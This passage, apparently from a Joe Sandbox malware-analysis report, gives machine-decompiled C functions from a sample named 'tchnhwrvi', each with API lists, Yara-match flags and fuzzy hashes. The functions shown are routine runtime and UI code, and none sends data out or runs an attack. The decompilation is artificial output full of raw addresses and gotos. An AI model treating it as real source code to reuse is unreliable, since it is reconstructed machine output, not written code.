                    					E00405940(_t261, _t285, _t309);
                    				}
                    				_t299 = _a4;
                    				_t266 =  *((intOrPtr*)( *((intOrPtr*)(_t261 + 0xc)) + 8));
                    				asm("stosd");
                    				_v116 = _t266;
                    				asm("stosd");
                    				asm("stosd");
                    				_t186 = _v100;
                    				_t286 = _t186;
                    				_v48 = _t286;
                    				if(_t186 < _v88) {
                    					_t293 = _v84;
                    					_t263 = 0;
                    					_v76 = 0;
                    					while(1) {
                    						_v49 =  *_t286;
                    						_t190 = _v72;
                    						_v68 = _t263;
                    						_v56 = 1;
                    						if(_t266 != 0xfde9) {
                    							goto L22;
                    						}
                    						_t274 = _t263;
                    						_t228 =  *(0x4160f8 + _t190 * 4) + 0x2e + _t293;
                    						_v76 = _t228;
                    						while( *_t228 != 0) {
                    							_t274 =  &(_t274->Internal);
                    							_t228 = _t228 + 1;
                    							if(_t274 < 5) {
                    								continue;
                    							}
                    							break;
                    						}
                    						_t295 = _v88 - _t286;
                    						_v56 = _t274;
                    						if(_t274 <= 0) {
                    							_t276 =  *((char*)(( *_t286 & 0x000000ff) + 0x415778)) + 1;
                    							_v80 = _t276;
                    							__eflags = _t276 - _t295;
                    							if(_t276 > _t295) {
                    								__eflags = _t295;
                    								if(_t295 <= 0) {
                    									goto L44;
                    								} else {
                    									_t301 = _v84;
                    									do {
                    										 *((char*)( *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _t301 + _t263 + 0x2e)) =  *((intOrPtr*)(_t263 + _t286));
                    										_t263 =  &(_t263->Internal);
                    										__eflags = _t263 - _t295;
                    									} while (_t263 < _t295);
                    									goto L43;
                    								}
                    								L52:
                    							} else {
                    								_v132 = _t263;
                    								__eflags = _t276 - 4;
                    								_v128 = _t263;
                    								_v60 = _t286;
                    								_v56 = (_t276 == 4) + 1;
                    								_t237 = E0040AD3D( &_v132,  &_v68,  &_v60, (_t276 == 4) + 1,  &_v132, _v64);
                    								_t308 = _t307 + 0x14;
                    								__eflags = _t237 - 0xffffffff;
                    								if(_t237 != 0xffffffff) {
                    									_t293 = _v84;
                    									goto L21;
                    								}
                    							}
                    						} else {
                    							_t243 =  *((char*)(( *_v76 & 0x000000ff) + 0x415778)) + 1;
                    							_v60 = _t243;
                    							_t244 = _t243 - _t274;
                    							_v80 = _t244;
                    							if(_t244 > _t295) {
                    								__eflags = _t295;
                    								if(_t295 > 0) {
                    									_t245 = _v48;
                    									_t302 = _v56;
                    									do {
                    										_t281 =  *((intOrPtr*)(_t263 + _t245));
                    										_t286 =  *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _v84 + _t263;
                    										_t263 =  &(_t263->Internal);
                    										_t286[_t302 + 0x2e] = _t281;
                    										__eflags = _t263 - _t295;
                    									} while (_t263 < _t295);
                    									L43:
                    									_t299 = _a4;
                    								}
                    								L44:
                    								 *(_t299 + 4) =  &(( *(_t299 + 4))[_t295]);
                    							} else {
                    								_t296 = _t263;
                    								_t264 = _v76;
                    								do {
                    									 *((char*)(_t305 + _t296 - 0x18)) =  *_t264;
                    									_t296 =  &(_t296->Internal);
                    									_t264 = _t264 + 1;
                    								} while (_t296 < _t274);
                    								_t303 = _v80;
                    								_t263 = 0;
                    								if(_v80 > 0) {
                    									E00403120( &_v28 + _t274, _t286, _t303);
                    									_t274 = _v56;
                    									_t307 = _t307 + 0xc;
                    								}
                    								_t293 = _v84;
                    								_t289 = _t263;
                    								_t304 = _v72;
                    								do {
                    									 *( *((intOrPtr*)(0x4160f8 + _t304 * 4)) + _t293 + _t289 + 0x2e) = _t263;
                    									_t289 =  &(_t289->Internal);
                    								} while (_t289 < _t274);
                    								_t299 = _a4;
                    								_v108 =  &_v28;
                    								_v124 = _t263;
                    								_v120 = _t263;
                    								_v56 = (_v60 == 4) + 1;
                    								_t255 = E0040AD3D( &_v124,  &_v68,  &_v108, (_v60 == 4) + 1,  &_v124, _v64);
                    								_t308 = _t307 + 0x14;
                    								if(_t255 != 0xffffffff) {
                    									L21:
                    									_t197 =  &(_v48[_v80]) - 1;
                    									L31:
                    									_v48 = _t197 + 1;
                    									_t201 = E00407464(_v112, _t263,  &_v68, _v56,  &_v44, 5, _t263, _t263);
                    									_t307 = _t308 + 0x20;
                    									_v60 = _t201;
                    									if(_t201 != 0) {
                    										if(WriteFile(_v104,  &_v44, _t201,  &_v96, _t263) == 0) {
                    											L50:
                    											 *_t299 = GetLastError();
                    										} else {
                    											_t286 = _v48;
                    											_t207 =  *((intOrPtr*)(_t299 + 8)) - _v100 + _t286;
                    											_v76 = _t207;
                    											 *(_t299 + 4) = _t207;
                    											if(_v96 >= _v60) {
                    												if(_v49 != 0xa) {
                    													L38:
                    													if(_t286 < _v88) {
                    														_t266 = _v116;
                    														continue;
                    													}
                    												} else {
                    													_t209 = 0xd;
                    													_v92 = _t209;
                    													if(WriteFile(_v104,  &_v92, 1,  &_v96, _t263) == 0) {
                    														goto L50;
                    													} else {
                    														if(_v96 >= 1) {
                    															 *((intOrPtr*)(_t299 + 8)) =  *((intOrPtr*)(_t299 + 8)) + 1;
                    															 *(_t299 + 4) =  &(( *(_t299 + 4))[1]);
                    															_t286 = _v48;
                    															_v76 =  *(_t299 + 4);
                    															goto L38;
                    														}
                    													}
                    												}
                    											}
                    										}
                    									}
                    								}
                    							}
                    						}
                    						goto L51;
                    						L22:
                    						_t271 =  *(0x4160f8 + _t190 * 4);
                    						_v80 = _t271;
                    						_t191 =  *((intOrPtr*)(_t271 + _t293 + 0x2d));
                    						__eflags = _t191 & 0x00000004;
                    						if((_t191 & 0x00000004) == 0) {
                    							_t271 =  *_t286 & 0x000000ff;
                    							_t194 =  *((intOrPtr*)( *((intOrPtr*)(_v64 + 0xc))));
                    							__eflags =  *((intOrPtr*)(_t194 + _t271 * 2)) - _t263;
                    							if( *((intOrPtr*)(_t194 + _t271 * 2)) >= _t263) {
                    								_push(_v64);
                    								_push(1);
                    								_push(_t286);
                    								goto L29;
                    							} else {
                    								_t214 =  &(_t286[1]);
                    								_v60 = _t214;
                    								__eflags = _t214 - _v88;
                    								if(_t214 >= _v88) {
                    									 *((char*)(_v80 + _t293 + 0x2e)) =  *_t286;
                    									 *( *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _t293 + 0x2d) =  *( *((intOrPtr*)(0x4160f8 + _v72 * 4)) + _t293 + 0x2d) | 0x00000004;
                    									 *(_t299 + 4) =  &(_v76[1]);
                    								} else {
                    									_t221 = E0040942F(_t271, _t286,  &_v68, _t286, 2, _v64);
                    									_t308 = _t307 + 0x10;
                    									__eflags = _t221 - 0xffffffff;
                    									if(_t221 != 0xffffffff) {
                    										_t197 = _v60;
                    										goto L31;
                    									}
                    								}
                    							}
                    						} else {
                    							_push(_v64);
                    							_v36 =  *(_t271 + _t293 + 0x2e) & 0x000000fb;
                    							_t224 =  *_t286;
                    							_v35 = _t224;
                    							 *((char*)(_t271 + _t293 + 0x2d)) = _t224;
                    							_push(2);
                    							_push( &_v36);
                    							L29:
                    							_push( &_v68);
                    							_t196 = E0040942F(_t271, _t286);
                    							_t308 = _t307 + 0x10;
                    							__eflags = _t196 - 0xffffffff;
                    							if(_t196 != 0xffffffff) {
                    								_t197 = _v48;
                    								goto L31;
                    							}
                    						}
                    						goto L51;
                    					}
                    				}
                    				L51:
                    				 *[fs:0x0] = _v16;
                    				_pop(_t292);
                    				_pop(_t300);
                    				_pop(_t262);
                    				__eflags = _v20 ^ _t305;
                    				return E004018D4(_t299, _t262, _v20 ^ _t305, _t286, _t292, _t300);
                    				goto L52;
                    			}

                    APIs
                    • GetConsoleOutputCP.KERNEL32(B51C3102,00000000,00000000,00000008), ref: 00409FF0
                      • Part of subcall function 00407464: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,00409C6B,?,00000000,-00000008), ref: 004074C5
                    • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0040A242
                    • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0040A288
                    • GetLastError.KERNEL32 ref: 0040A32B
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                    • String ID:
                    • API String ID: 2112829910-0
                    • Opcode ID: 2b1a9ec60bbf1f36d0f4081ed5637648e80784a725bb53bc0c30928046e37d39
                    • Instruction ID: 286eb15663e9a8c4fe1ad12a89817a662dc5e0061b0541279607a600132331f4
                    • Opcode Fuzzy Hash: 2b1a9ec60bbf1f36d0f4081ed5637648e80784a725bb53bc0c30928046e37d39
                    • Instruction Fuzzy Hash: 47D18BB5D042589FCB14CFA8C8809EDBBB4FF08304F14817AE866FB391D634A956CB55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 66%
                    			E00403694(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                    				signed int* _t52;
                    				signed int _t53;
                    				intOrPtr _t54;
                    				signed int _t58;
                    				signed int _t61;
                    				intOrPtr _t71;
                    				signed int _t75;
                    				signed int _t79;
                    				signed int _t81;
                    				signed int _t84;
                    				signed int _t85;
                    				signed int _t97;
                    				signed int* _t98;
                    				signed char* _t101;
                    				signed int _t107;
                    				void* _t111;
                    
                    				_push(0x10);
                    				_push(0x413518);
                    				E00401EE0(__ebx, __edi, __esi);
                    				_t75 = 0;
                    				_t52 =  *(_t111 + 0x10);
                    				_t81 = _t52[1];
                    				if(_t81 == 0 ||  *((intOrPtr*)(_t81 + 8)) == 0) {
                    					L30:
                    					_t53 = 0;
                    					__eflags = 0;
                    					goto L31;
                    				} else {
                    					_t97 = _t52[2];
                    					if(_t97 != 0 ||  *_t52 < 0) {
                    						_t84 =  *_t52;
                    						_t107 =  *(_t111 + 0xc);
                    						if(_t84 >= 0) {
                    							_t107 = _t107 + 0xc + _t97;
                    						}
                    						 *(_t111 - 4) = _t75;
                    						_t101 =  *(_t111 + 0x14);
                    						if(_t84 >= 0 || ( *_t101 & 0x00000010) == 0) {
                    							L10:
                    							_t54 =  *((intOrPtr*)(_t111 + 8));
                    							__eflags = _t84 & 0x00000008;
                    							if((_t84 & 0x00000008) == 0) {
                    								__eflags =  *_t101 & 0x00000001;
                    								if(( *_t101 & 0x00000001) == 0) {
                    									_t84 =  *(_t54 + 0x18);
                    									__eflags = _t101[0x18] - _t75;
                    									if(_t101[0x18] != _t75) {
                    										__eflags = _t84;
                    										if(_t84 == 0) {
                    											goto L32;
                    										} else {
                    											__eflags = _t107;
                    											if(_t107 == 0) {
                    												goto L32;
                    											} else {
                    												__eflags =  *_t101 & 0x00000004;
                    												_t79 = 0;
                    												_t75 = (_t79 & 0xffffff00 | ( *_t101 & 0x00000004) != 0x00000000) + 1;
                    												__eflags = _t75;
                    												 *(_t111 - 0x20) = _t75;
                    												goto L29;
                    											}
                    										}
                    									} else {
                    										__eflags = _t84;
                    										if(_t84 == 0) {
                    											goto L32;
                    										} else {
                    											__eflags = _t107;
                    											if(_t107 == 0) {
                    												goto L32;
                    											} else {
                    												E00403120(_t107, E00402768(_t84,  &(_t101[8])), _t101[0x14]);
                    												goto L29;
                    											}
                    										}
                    									}
                    								} else {
                    									__eflags =  *(_t54 + 0x18);
                    									if( *(_t54 + 0x18) == 0) {
                    										goto L32;
                    									} else {
                    										__eflags = _t107;
                    										if(_t107 == 0) {
                    											goto L32;
                    										} else {
                    											E00403120(_t107,  *(_t54 + 0x18), _t101[0x14]);
                    											__eflags = _t101[0x14] - 4;
                    											if(_t101[0x14] == 4) {
                    												__eflags =  *_t107;
                    												if( *_t107 != 0) {
                    													_push( &(_t101[8]));
                    													_push( *_t107);
                    													goto L21;
                    												}
                    											}
                    											goto L29;
                    										}
                    									}
                    								}
                    							} else {
                    								_t84 =  *(_t54 + 0x18);
                    								goto L12;
                    							}
                    						} else {
                    							_t71 =  *0x415c6c; // 0x0
                    							 *((intOrPtr*)(_t111 - 0x1c)) = _t71;
                    							if(_t71 == 0) {
                    								goto L10;
                    							} else {
                    								 *0x40e160();
                    								_t84 =  *((intOrPtr*)(_t111 - 0x1c))();
                    								L12:
                    								if(_t84 == 0 || _t107 == 0) {
                    									L32:
                    									E0040579A(_t75, _t84, _t97, _t107);
                    									asm("int3");
                    									_push(8);
                    									_push(0x413538);
                    									E00401EE0(_t75, _t101, _t107);
                    									_t98 =  *(_t111 + 0x10);
                    									_t85 =  *(_t111 + 0xc);
                    									__eflags =  *_t98;
                    									if(__eflags >= 0) {
                    										_t103 = _t85 + 0xc + _t98[2];
                    										__eflags = _t85 + 0xc + _t98[2];
                    									} else {
                    										_t103 = _t85;
                    									}
                    									 *(_t111 - 4) =  *(_t111 - 4) & 0x00000000;
                    									_t108 =  *(_t111 + 0x14);
                    									_push( *(_t111 + 0x14));
                    									_push(_t98);
                    									_push(_t85);
                    									_t77 =  *((intOrPtr*)(_t111 + 8));
                    									_push( *((intOrPtr*)(_t111 + 8)));
                    									_t58 = E00403694(_t77, _t103, _t108, __eflags) - 1;
                    									__eflags = _t58;
                    									if(_t58 == 0) {
                    										_t61 = E00404404(_t103, _t108[0x18], E00402768( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])));
                    									} else {
                    										_t61 = _t58 - 1;
                    										__eflags = _t61;
                    										if(_t61 == 0) {
                    											_t61 = E00404414(_t103, _t108[0x18], E00402768( *((intOrPtr*)(_t77 + 0x18)),  &(_t108[8])), 1);
                    										}
                    									}
                    									 *(_t111 - 4) = 0xfffffffe;
                    									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
                    									return _t61;
                    								} else {
                    									 *_t107 = _t84;
                    									_push( &(_t101[8]));
                    									_push(_t84);
                    									L21:
                    									 *_t107 = E00402768();
                    									L29:
                    									 *(_t111 - 4) = 0xfffffffe;
                    									_t53 = _t75;
                    									L31:
                    									 *[fs:0x0] =  *((intOrPtr*)(_t111 - 0x10));
                    									return _t53;
                    								}
                    							}
                    						}
                    					} else {
                    						goto L30;
                    					}
                    				}
                    			}

                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.564427693.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_400000_tchnhwrvi.jbxd
                    Yara matches
                    Similarity
                    • API ID: AdjustPointer
                    • String ID:
                    • API String ID: 1740715915-0
                    • Opcode ID: 545f8a9253608014606d57981c5e6b4fc05d413ea05323f44a6b83220745b28c
                    • Instruction ID: c36bffaf7fe8f9e15fcbe67479aef6d6b820bcd02780ea586b95a92c856a1c7e
                    • Opcode Fuzzy Hash: 545f8a9253608014606d57981c5e6b4fc05d413ea05323f44a6b83220745b28c
                    • Instruction Fuzzy Hash: E45103F6600202AFDB299F21C840B6A7BA9EF40B06F14813FE805672D1D739EE41C798
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E002892BB(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                    				char _v8;
                    				signed int _v12;
                    				char _v20;
                    				char _t43;
                    				char _t46;
                    				signed int _t53;
                    				signed int _t54;
                    				intOrPtr _t56;
                    				int _t57;
                    				int _t58;
                    				char _t59;
                    				short* _t60;
                    				int _t65;
                    				char* _t73;
                    
                    				_t73 = _a8;
                    				if(_t73 == 0 || _a12 == 0) {
                    					L5:
                    					return 0;
                    				} else {
                    					if( *_t73 != 0) {
                    						E002841F6( &_v20, __edi, _a16);
                    						_t43 = _v20;
                    						__eflags =  *(_t43 + 0x14);
                    						if( *(_t43 + 0x14) != 0) {
                    							_t46 = E002893EB( *_t73 & 0x000000ff,  &_v20);
                    							__eflags = _t46;
                    							if(_t46 == 0) {
                    								__eflags = _a4;
                    								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000);
                    								if(__eflags != 0) {
                    									L10:
                    									__eflags = _v8;
                    									if(_v8 != 0) {
                    										_t53 = _v12;
                    										_t11 = _t53 + 0x70;
                    										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
                    										__eflags =  *_t11;
                    									}
                    									return 1;
                    								}
                    								L21:
                    								_t54 = E00283CF8(__eflags);
                    								 *_t54 = 0x2a;
                    								__eflags = _v8;
                    								if(_v8 != 0) {
                    									_t54 = _v12;
                    									_t33 = _t54 + 0x70;
                    									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
                    									__eflags =  *_t33;
                    								}
                    								return _t54 | 0xffffffff;
                    							}
                    							_t56 = _v20;
                    							_t65 =  *(_t56 + 0xac);
                    							__eflags = _t65 - 1;
                    							if(_t65 <= 1) {
                    								L17:
                    								__eflags = _a12 -  *(_t56 + 0xac);
                    								if(__eflags < 0) {
                    									goto L21;
                    								}
                    								__eflags = _t73[1];
                    								if(__eflags == 0) {
                    									goto L21;
                    								}
                    								L19:
                    								_t57 =  *(_t56 + 0xac);
                    								__eflags = _v8;
                    								if(_v8 == 0) {
                    									return _t57;
                    								}
                    								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
                    								return _t57;
                    							}
                    							__eflags = _a12 - _t65;
                    							if(_a12 < _t65) {
                    								goto L17;
                    							}
                    							__eflags = _a4;
                    							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                    							__eflags = _t58;
                    							_t56 = _v20;
                    							if(_t58 != 0) {
                    								goto L19;
                    							}
                    							goto L17;
                    						}
                    						_t59 = _a4;
                    						__eflags = _t59;
                    						if(_t59 != 0) {
                    							 *_t59 =  *_t73 & 0x000000ff;
                    						}
                    						goto L10;
                    					} else {
                    						_t60 = _a4;
                    						if(_t60 != 0) {
                    							 *_t60 = 0;
                    						}
                    						goto L5;
                    					}
                    				}
                    			}

                    APIs
                    • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 002892EF
                    • __isleadbyte_l.LIBCMT ref: 00289322
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00282E0D,?,00000000,00000000,?,?,?,?,00282E0D,00000000,?), ref: 00289353
                    • MultiByteToWideChar.KERNEL32(00000080,00000009,00282E0D,00000001,00000000,00000000,?,?,?,?,00282E0D,00000000,?), ref: 002893C1
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                    • String ID:
                    • API String ID: 3058430110-0
                    • Opcode ID: e92abb991ef77fd61edb1738c920f96238c612f6d8e32b31cf1c8921328d1ad9
                    • Instruction ID: 6c49353cee6375a8602430ad49f29ad01738cb9e001f183b89820eef730d803d
                    • Opcode Fuzzy Hash: e92abb991ef77fd61edb1738c920f96238c612f6d8e32b31cf1c8921328d1ad9
                    • Instruction Fuzzy Hash: 3931E235A2224AFFCB10EF64C8859BE3BB8BF01311F1885A9E4659B1D6D330CDA0DB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 93%
                    			E00281090() {
                    				void* _v8;
                    				void* _v12;
                    				void* _v524;
                    				int _t10;
                    				long _t13;
                    				long _t17;
                    				int _t28;
                    				int _t29;
                    
                    				SendMessageW( *0x2970ec, 0xb0,  &_v12,  &_v8);
                    				_t10 = _v12;
                    				_t28 = _v8;
                    				if(_t10 != _t28) {
                    					if(_t10 <  *0x298270) {
                    						_t28 = _t10;
                    					}
                    				} else {
                    					 *0x298270 = _t10;
                    				}
                    				_t29 = SendMessageW( *0x2970ec, 0xc9, _t28, 0);
                    				_t13 = SendMessageW( *0x2970ec, 0xbb, _t29, 0);
                    				if( *0x298274 != _t29 ||  *0x298278 != _t28) {
                    					_push(_t28 - _t13 + 1);
                    					_t5 = _t29 + 1; // 0x1
                    					E00281000( &_v524, 0x231,  *0x2970fc, _t5);
                    					_t17 = SendMessageW( *0x2970f4, 0x29, 0,  &_v524);
                    					 *0x298274 = _t29;
                    					 *0x298278 = _t28;
                    					return _t17;
                    				} else {
                    					return _t13;
                    				}
                    			}












                    APIs
                    • SendMessageW.USER32(?,000000B0,?,?), ref: 002810B6
                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 002810E1
                    • SendMessageW.USER32(?,000000BB,00000000,00000000), ref: 002810F4
                    • SendMessageW.USER32(?,00000029,00000000,?), ref: 0028113D
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 8f9e7e1eb2eb4ff65370eb654d8b063f56432c1875c7e953f8628fa1716ea4b8
                    • Instruction ID: 745d8aea2948d59e8f4131270c2d6e2400b802fcee182b485bd219908670f12e
                    • Opcode Fuzzy Hash: 8f9e7e1eb2eb4ff65370eb654d8b063f56432c1875c7e953f8628fa1716ea4b8
                    • Instruction Fuzzy Hash: 6211E679A20204EFDB20DB65FC89FAB73BDE788700F104217FA05971D0DA71A955CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0028CB2D(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                    				intOrPtr _t25;
                    				void* _t26;
                    
                    				_t25 = _a16;
                    				if(_t25 == 0x65 || _t25 == 0x45) {
                    					_t26 = E0028C41F(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                    					goto L9;
                    				} else {
                    					_t35 = _t25 - 0x66;
                    					if(_t25 != 0x66) {
                    						__eflags = _t25 - 0x61;
                    						if(_t25 == 0x61) {
                    							L7:
                    							_t26 = E0028C506(_a4, _a8, _a12, _a20, _a24, _a28);
                    						} else {
                    							__eflags = _t25 - 0x41;
                    							if(__eflags == 0) {
                    								goto L7;
                    							} else {
                    								_t26 = E0028CA40(__ebx, __edx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                    							}
                    						}
                    						L9:
                    						return _t26;
                    					} else {
                    						return E0028C97F(__ebx, __edx, _t35, _a4, _a8, _a12, _a20, _a28);
                    					}
                    				}
                    			}






                    APIs
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                    • String ID:
                    • API String ID: 3016257755-0
                    • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                    • Instruction ID: 9869ca653316b93273578c834a361c9a5a89d74068560ac355614e0913b6d024
                    • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                    • Instruction Fuzzy Hash: 2911C27A01114EBBCF126E84DC12CEE3F22FB08394B288415FE1858070D336C9B1ABA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E002866B4() {
                    				WCHAR* _t2;
                    				void* _t15;
                    				WCHAR* _t17;
                    
                    				_t2 = GetEnvironmentStringsW();
                    				_t17 = _t2;
                    				if(_t17 != 0) {
                    					if( *_t17 != 0) {
                    						goto L3;
                    						do {
                    							do {
                    								L3:
                    								_t2 =  &(_t2[1]);
                    							} while ( *_t2 != 0);
                    							_t2 =  &(_t2[1]);
                    						} while ( *_t2 != 0);
                    					}
                    					_t1 = _t2 - _t17 + 2; // -2
                    					_t10 = _t1;
                    					_t15 = E00286C85(_t1);
                    					if(_t15 != 0) {
                    						E002898B0(_t15, _t17, _t10);
                    					}
                    					FreeEnvironmentStringsW(_t17);
                    					return _t15;
                    				} else {
                    					return 0;
                    				}
                    			}







                    APIs
                    • GetEnvironmentStringsW.KERNEL32(00000000,002834C3), ref: 002866B7
                    • __malloc_crt.LIBCMT ref: 002866E6
                    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 002866F3
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: EnvironmentStrings$Free__malloc_crt
                    • String ID:
                    • API String ID: 237123855-0
                    • Opcode ID: 5feb5e2e281e54c244659ac014d7db412709a4fa045606493c8e40ed6a3999c8
                    • Instruction ID: bcaabd3be9ac1cb0bb9c4001a32e45f8ee12cb551e5e2380e89b971fcad1fe64
                    • Opcode Fuzzy Hash: 5feb5e2e281e54c244659ac014d7db412709a4fa045606493c8e40ed6a3999c8
                    • Instruction Fuzzy Hash: 75F0827F9225729E9B317F34BC4E867263EDED136031A4426F402D3194FA648DA587A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00282610(intOrPtr _a4) {
                    				short _v516;
                    				short _v1028;
                    
                    				LoadStringW( *0x2970e0, 0x179,  &_v516, 3);
                    				wsprintfW( &_v1028,  &_v516, _a4);
                    				LoadStringW( *0x2970e0, 0x171,  &_v516, 6);
                    				return MessageBoxW( *0x2970e4,  &_v1028,  &_v516, 0x33);
                    			}






                    APIs
                    • LoadStringW.USER32(?,00000179,?,00000003), ref: 00282635
                    • wsprintfW.USER32 ref: 00282649
                    • LoadStringW.USER32(?,00000171,?,00000006), ref: 00282666
                    • MessageBoxW.USER32(?,?,?,00000033), ref: 0028267E
                    Memory Dump Source
                    • Source File: 00000002.00000002.564345946.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000002.00000002.564331157.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564382776.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564399761.0000000000294000.00000008.00000001.01000000.00000004.sdmp
                    • Associated: 00000002.00000002.564416353.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: LoadString$Messagewsprintf
                    • String ID:
                    • API String ID: 3675432989-0
                    • Opcode ID: 32b838d3014462a6ed3094297d467b3e168fcbfeb6e0b64198a6beaf648b8e5f
                    • Instruction ID: 8efd40926e72bb3c5ca581b9dc27891ea6d394ff418b03ed738ca7b7ff8d4a26
                    • Opcode Fuzzy Hash: 32b838d3014462a6ed3094297d467b3e168fcbfeb6e0b64198a6beaf648b8e5f
                    • Instruction Fuzzy Hash: 290144B6920218AFD711DB98EC89FF6737CBB48700F04818BB709A7181D6706A14CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E0040B766(void* _a4, long _a8, DWORD* _a12) {
                    				void* _t13;
                    
                    				_t13 = WriteConsoleW( *0x415880, _a4, _a8, _a12, 0);
                    				if(_t13 == 0 && GetLastError() == 6) {
                    					E0040B74F();
                    					E0040B711();
                    					_t13 = WriteConsoleW( *0x415880, _a4, _a8, _a12, _t13);
                    				}
                    				return _t13;
                    			}





                    APIs
                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000), ref: 0040B77D
                    • GetLastError.KERNEL32(?,0040AF20,00000000,00000001,?,00000008,?,0040A37F,00000008,00000000,00000000,00000008,00000008,?,0040A922,00000000), ref: 0040B789
